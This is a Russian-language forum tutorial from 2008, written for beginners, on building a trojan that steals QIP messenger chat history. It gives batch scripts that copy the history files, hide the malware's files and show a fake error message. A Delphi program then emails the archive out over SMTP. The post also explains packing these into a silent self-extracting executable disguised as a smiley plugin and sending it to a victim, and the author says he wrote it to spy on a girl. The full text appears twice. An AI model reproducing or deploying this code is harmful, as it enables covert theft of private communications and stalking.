_HeSh_
23.11.2008, 15:21
!!! Эта статья рассчитана только для новичков Просьба гуру, не пинать. Если чё не нравится – пишем своё.
Итак, начнём.
В данной статье, я хочу вам показать как имея совсем базовые познания в кодинге написать что-то типа вируса, который будет тырить хистори по всем номеркам на компе жертвы.
Для этого нам понадобится Блокнот, Delphi, и не много усидчивости.
1. Мы должны написать код, который будет искать файлы истории, по всем папкам и копировать их в одно место.
2. Запаковать все файлы в один архив.
3. Отослать себе данный файл.
Мой вирь – состоит из 3х файлов. Так как с начала написания его, я знал только теорию – и что у командной строки есть команда dir copy и echo off. Поэтому, я предлагаю вам, тоже, ознакомится с кодом трёх файлов – для простоты понятия. Если кому не нравится, то делайте в один – полёт фантазии вам в помощь.
Пишем первый файл test.bat
Echo off
@cd C:\
@md test2 //создаём папку тест 2
@if exist C:\Progra~1\QIP\qip.exe xcopy C:\Progra~1\QIP\Users\*.txt C:\test2\*.txt /q /e /h /y > null //если файл qip.exe существует по указанному адресу, то копируем все файлы формата txt из папки User в папку тест2. Ключи /q /e /h /y --- для копирования скрытых файлов, и копирования в под каталогах.
@attrib +h +s C:\"Program Files"\QIP\1.exe //скрываем и делаем системным 3й файл нашего вируса, который распакуется в папку C:\"Program Files"\QIP\ с именем 1.exe . "Program Files" – не зря берётся в скобки, так как пробелы командная строка считает окончанием команды или ещё чего либо.
@attrib +h +s C:\"Program Files"\QIP\arh.bat // аналогично для второго файла вируса
start/min C:\"Program Files"\QIP\arh.bat //запуск в скрытом окне второго файла вируса (хотя можно всё влепить в один этот)
echo >> read.txt У вас установлена неизвестная версия Qip. Обновления не были установлены.
// данная строка обеспечит добавление в файл реад.тхт строчки «левой отмазки»
start/max read.txt // запустим файл с текстом, на всю рабочую область, что поможет скрыть в это же время архивирование файлов, которое обеспечивает 2й файл arh.bat
exit // выход из командной строки, на всякий пожарный пропишем.
Далее приступаем ко второму файлу, который обеспечит упаковку файла в архив arh.bat
echo off
"C:\Program Files\WinRAR\rar.exe" a -m5 -o+ -r C:\test2\backu.rar C:\test2\*.* // команда для упаковки в архив с именем backu.rar, который должен будет создастся в C:\test2\ и архивировать все файлы, всех форматов из папки rar C:\test2\
Ключь –r заставляет архивировать и подкаталоги и файлы в них. –m5 - метод сжатия (1-5). Подробнее можно посмотреть в хелпе к Winrar.
@attrib +h +s C:\"Program Files"\QIP\test.bat //прячет файл
start/min C:\"Program Files"\QIP\1.exe // запускает в скрытом режиме делфи файл, который и будет заниматься отправкой.
Exit //если прописали start, то нужно и exit - иначе, бывает, что не закрывается.
Теперь приступим к написанию кода Delphi.
Для данной программки нам понадобится вкладка Indy Clients и Indy Misc.
Закидываем на форму компоненты IdAntiFreeze IdMessage IdSMTP и Label с вкладки Standart.
Делаем формочку размером не больше 69*280 высота/длина --- хотя это уже ваша фантазия и пишем в Label что-то типа System Error. Please waite a few minutes, меняем имя формы на что-то вроде System Error и ставим свойство формы BorderStyle в режим bsNone.
И вот точный листинг того, что мы должно быть:
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, IdComponent, IdTCPConnection, IdTCPClient,
IdMessageClient, IdSMTP, IdMessage, IdBaseComponent, IdAntiFreezeBase,
IdAntiFreeze;
type
TForm1 = class(TForm)
IdAntiFreeze1: TIdAntiFreeze;
IdMessage1: TIdMessage;
IdSMTP1: TIdSMTP;
Label1: TLabel;
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
M:TIdMessage;
sm:tidsmtp;
att:tidattachment;
implementation
{$R *.dfm}
begin
m:=TIdMessage.create(form1);
m.From.Text:='vasja@inbox.ru';//от кого
m.Recipients.Add;
m.Recipients.Items[0].Text:='Pupkin@mail.ru'; //кому
m.Subject:='Subject';// тема письма
m.Body.Text:='По*** на текст';// текст письма
att:=tidattachment.Create(m.MessageParts,'C:\test2 \backu.rar');// полное имя файла, архива – который должен быть отправлен.
sm:=tidsmtp.Create(form1);
sm.AuthenticationType := atLogin;
sm.Host:='smtp.inbox.ru'; //хост
sm.Username:='Логин с которого будет отсылаться письмо';
sm.Password:='123456'; //пароль к этому ящику
sm.Connect();
if sm.Connected then
begin
sm.Send(M);
end;
sm.Disconnect;
att.Free;
sm.Free;
end.
Делфи код был взят с delphiexpert.ru (c)
Ну вот и всё. Как только письмо будет отправлено, у юзера появится окошко с якобы ошибкой. Просто влом переделывать. Я думал что оно будет гореть сразу, а оказалось что появиться после выполнения отправки. + в моей версии окошко не особо видно, так как появляется над часами. Координаты появления можно задать в полях Top Left компонента Form. Толи это не компонент но … )
Как сделать чтоб процесс не был виден в дереве, и не показывался на панели задач – я не смотрел. Вернее смотрел, но там всё заумно – я его и не трогал. Так как писалось это всё чтобы узнать историю одной девчоночки) Ну это уже ваша фантазия.
Блин .. чуть не забыл – что это всё нужно сделать одним exe файлом ..
Продолжим)
Выделяем эти 3 файла. Жмём «добавит в архив…»
Ставим галочку – Создать SFX-архив, ставим метод сжатия, переходим на вкладку «дополнительно», - Параметры SFX-архива --- Путь для распаковки… Пишем C:\Program Files\QIP\
--- Выполнить после распаковки – test.bat
Переходим на вкладку Режимы --- Режим ввода информации – Не показывать начальный диалог
Режим перезаписи – Перезаписывать все файлы без запроса.
И всё. Жмём Ок.
Получаем файл .exe который после запуска сразу начинает свою работу.
Конечно я бы советовал назвать это чудо как-то так «Qip_plugin_smiles_8.0.6.13(by Foolf).exe», залить на файлообменник, и дать просто ссылку тому, чью историю хочешь подтырить. Написав при этом … Ок, я жду, пока скинешь мне установленный смайл.
На этом всё) Просьба ещё раз, сильно не пинать. Если кому помог в чём-то разобраться то жду +++ в репу) :)
Итак, начнём.
В данной статье, я хочу вам показать как имея совсем базовые познания в кодинге написать что-то типа вируса, который будет тырить хистори по всем номеркам на компе жертвы.
Для этого нам понадобится Блокнот, Delphi, и не много усидчивости.
1. Мы должны написать код, который будет искать файлы истории, по всем папкам и копировать их в одно место.
2. Запаковать все файлы в один архив.
3. Отослать себе данный файл.
Мой вирь – состоит из 3х файлов. Так как с начала написания его, я знал только теорию – и что у командной строки есть команда dir copy и echo off. Поэтому, я предлагаю вам, тоже, ознакомится с кодом трёх файлов – для простоты понятия. Если кому не нравится, то делайте в один – полёт фантазии вам в помощь.
Пишем первый файл test.bat
Echo off
@cd C:\
@md test2 //создаём папку тест 2
@if exist C:\Progra~1\QIP\qip.exe xcopy C:\Progra~1\QIP\Users\*.txt C:\test2\*.txt /q /e /h /y > null //если файл qip.exe существует по указанному адресу, то копируем все файлы формата txt из папки User в папку тест2. Ключи /q /e /h /y --- для копирования скрытых файлов, и копирования в под каталогах.
@attrib +h +s C:\"Program Files"\QIP\1.exe //скрываем и делаем системным 3й файл нашего вируса, который распакуется в папку C:\"Program Files"\QIP\ с именем 1.exe . "Program Files" – не зря берётся в скобки, так как пробелы командная строка считает окончанием команды или ещё чего либо.
@attrib +h +s C:\"Program Files"\QIP\arh.bat // аналогично для второго файла вируса
start/min C:\"Program Files"\QIP\arh.bat //запуск в скрытом окне второго файла вируса (хотя можно всё влепить в один этот)
echo >> read.txt У вас установлена неизвестная версия Qip. Обновления не были установлены.
// данная строка обеспечит добавление в файл реад.тхт строчки «левой отмазки»
start/max read.txt // запустим файл с текстом, на всю рабочую область, что поможет скрыть в это же время архивирование файлов, которое обеспечивает 2й файл arh.bat
exit // выход из командной строки, на всякий пожарный пропишем.
Далее приступаем ко второму файлу, который обеспечит упаковку файла в архив arh.bat
echo off
"C:\Program Files\WinRAR\rar.exe" a -m5 -o+ -r C:\test2\backu.rar C:\test2\*.* // команда для упаковки в архив с именем backu.rar, который должен будет создастся в C:\test2\ и архивировать все файлы, всех форматов из папки rar C:\test2\
Ключь –r заставляет архивировать и подкаталоги и файлы в них. –m5 - метод сжатия (1-5). Подробнее можно посмотреть в хелпе к Winrar.
@attrib +h +s C:\"Program Files"\QIP\test.bat //прячет файл
start/min C:\"Program Files"\QIP\1.exe // запускает в скрытом режиме делфи файл, который и будет заниматься отправкой.
Exit //если прописали start, то нужно и exit - иначе, бывает, что не закрывается.
Теперь приступим к написанию кода Delphi.
Для данной программки нам понадобится вкладка Indy Clients и Indy Misc.
Закидываем на форму компоненты IdAntiFreeze IdMessage IdSMTP и Label с вкладки Standart.
Делаем формочку размером не больше 69*280 высота/длина --- хотя это уже ваша фантазия и пишем в Label что-то типа System Error. Please waite a few minutes, меняем имя формы на что-то вроде System Error и ставим свойство формы BorderStyle в режим bsNone.
И вот точный листинг того, что мы должно быть:
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, IdComponent, IdTCPConnection, IdTCPClient,
IdMessageClient, IdSMTP, IdMessage, IdBaseComponent, IdAntiFreezeBase,
IdAntiFreeze;
type
TForm1 = class(TForm)
IdAntiFreeze1: TIdAntiFreeze;
IdMessage1: TIdMessage;
IdSMTP1: TIdSMTP;
Label1: TLabel;
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
M:TIdMessage;
sm:tidsmtp;
att:tidattachment;
implementation
{$R *.dfm}
begin
m:=TIdMessage.create(form1);
m.From.Text:='vasja@inbox.ru';//от кого
m.Recipients.Add;
m.Recipients.Items[0].Text:='Pupkin@mail.ru'; //кому
m.Subject:='Subject';// тема письма
m.Body.Text:='По*** на текст';// текст письма
att:=tidattachment.Create(m.MessageParts,'C:\test2 \backu.rar');// полное имя файла, архива – который должен быть отправлен.
sm:=tidsmtp.Create(form1);
sm.AuthenticationType := atLogin;
sm.Host:='smtp.inbox.ru'; //хост
sm.Username:='Логин с которого будет отсылаться письмо';
sm.Password:='123456'; //пароль к этому ящику
sm.Connect();
if sm.Connected then
begin
sm.Send(M);
end;
sm.Disconnect;
att.Free;
sm.Free;
end.
Делфи код был взят с delphiexpert.ru (c)
Ну вот и всё. Как только письмо будет отправлено, у юзера появится окошко с якобы ошибкой. Просто влом переделывать. Я думал что оно будет гореть сразу, а оказалось что появиться после выполнения отправки. + в моей версии окошко не особо видно, так как появляется над часами. Координаты появления можно задать в полях Top Left компонента Form. Толи это не компонент но … )
Как сделать чтоб процесс не был виден в дереве, и не показывался на панели задач – я не смотрел. Вернее смотрел, но там всё заумно – я его и не трогал. Так как писалось это всё чтобы узнать историю одной девчоночки) Ну это уже ваша фантазия.
Блин .. чуть не забыл – что это всё нужно сделать одним exe файлом ..
Продолжим)
Выделяем эти 3 файла. Жмём «добавит в архив…»
Ставим галочку – Создать SFX-архив, ставим метод сжатия, переходим на вкладку «дополнительно», - Параметры SFX-архива --- Путь для распаковки… Пишем C:\Program Files\QIP\
--- Выполнить после распаковки – test.bat
Переходим на вкладку Режимы --- Режим ввода информации – Не показывать начальный диалог
Режим перезаписи – Перезаписывать все файлы без запроса.
И всё. Жмём Ок.
Получаем файл .exe который после запуска сразу начинает свою работу.
Конечно я бы советовал назвать это чудо как-то так «Qip_plugin_smiles_8.0.6.13(by Foolf).exe», залить на файлообменник, и дать просто ссылку тому, чью историю хочешь подтырить. Написав при этом … Ок, я жду, пока скинешь мне установленный смайл.
На этом всё) Просьба ещё раз, сильно не пинать. Если кому помог в чём-то разобраться то жду +++ в репу) :)